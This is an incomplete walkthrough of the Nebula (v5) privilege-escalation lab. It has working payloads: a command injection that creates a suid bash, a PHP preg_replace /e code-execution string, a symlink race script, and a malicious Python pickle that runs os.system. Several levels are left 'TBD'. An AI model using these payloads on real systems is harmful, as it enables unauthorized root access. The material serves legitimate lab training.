Exploit-Exercises: Nebula (v5) Walkthrough

(Updated: )
reference Exploit-Exercises: Nebula (v5), Exploit Education > Nebula
target ip 192.168.1.32

Level 00

suid:

Level 01

Hijack echo:

Level 02

Environment variable USER:

Level 03

Add a script /home/flag03/writable.d/test.sh:

Wait for cron:

You cannot use /tmp, because of nosuid:

Level 04

Try to rename the original file:

Level 05

/home/flag05/.backup/backup-19072011.tgz:

Login as user flag05:

Level 06

/etc/passwd:

Level 07

Code injection:

payload
1
127.0.0.1;cp /bin/bash /home/flag07/bash;chmod u+s /home/flag07/bash;echo 1

Level 08

/home/flag08/capture.pcap:

0x7f.

Level 09

preg_replace:

vuln
1
$contents = preg_replace("/(\[email (.*)\])/e", "spam(\"\\2\")", $contents);
payload
1
$contents = preg_replace("/(\[email (.*)\])/e", "spam(\"${${system($use_me)}}\")", $contents);

Level 10

Make the program access() the file which is owned by user level10, but open() the file which is owned by user flag10:

/tmp/test.sh
1
2
3
4
5
6
while [[ 1 -eq 1 ]]; do
    ln -svnf /tmp/test /tmp/1
    ln -svnf /home/flag10/token /tmp/1 &
    /home/flag10/flag10 /tmp/1 192.168.1.89
    sleep 1
done

Level 11

TBD

Level 12

TBD

Level 13

LD_PRELOAD to replace the original getuid.
But LD_PRELOAD cannot be used with suid program.

Level 14

1
2
3
4
5
6
7
import sys

result = []
for i, ch in enumerate(sys.argv[1]):
    result.append(chr(ord(ch) - i))

print("".join(result).strip())

Level 15

TBD

Level 16

Minimal vulnerable code:

/tmp/FLAG16.SH:

FLAG16.SH
1
2
3
4
#!/bin/bash

cp /bin/bash /home/flag16/bash
chmod u+s /home/flag16/bash

Level 17

pickle

1
2
3
4
5
6
7
8
9
import cPickle
import os

class payload(object):
  def __reduce__(self):
    return (os.system, (('cp /bin/bash /home/flag17/bash && chmod u+s /home/flag17/bash'),))

with open("flag17.pickle", "wb") as fp:
    cPickle.dump(payload(), fp)

Level 18

TBD

Level 19

TBD

I’ll try to complete this post when I’m not so busy..